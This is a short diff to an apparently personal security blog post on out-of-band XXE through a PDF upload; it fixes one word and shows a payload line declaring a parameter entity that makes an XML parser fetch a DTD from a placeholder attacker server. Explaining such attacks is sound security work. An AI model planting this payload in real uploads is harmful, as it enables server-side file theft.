saurinn/saurinn.github.com/src/pages/blog/xxe-oob-via-a-pdf-upload.md

 Here's the breakout from all of this:

-The first payload is what I inserted on the PDF file:
+The first payload is what I inserted in the PDF file:

 1. `<!ENTITY % ext SYSTEM "https://<attacker-server>/poc.dtd">`: This line defines a parameter entity named `%ext`.
 Parameter entities are used within the DTD itself.
 It instructs the XML parser to fetch the content from the remote URL `https://attacker-server/poc.dtd`.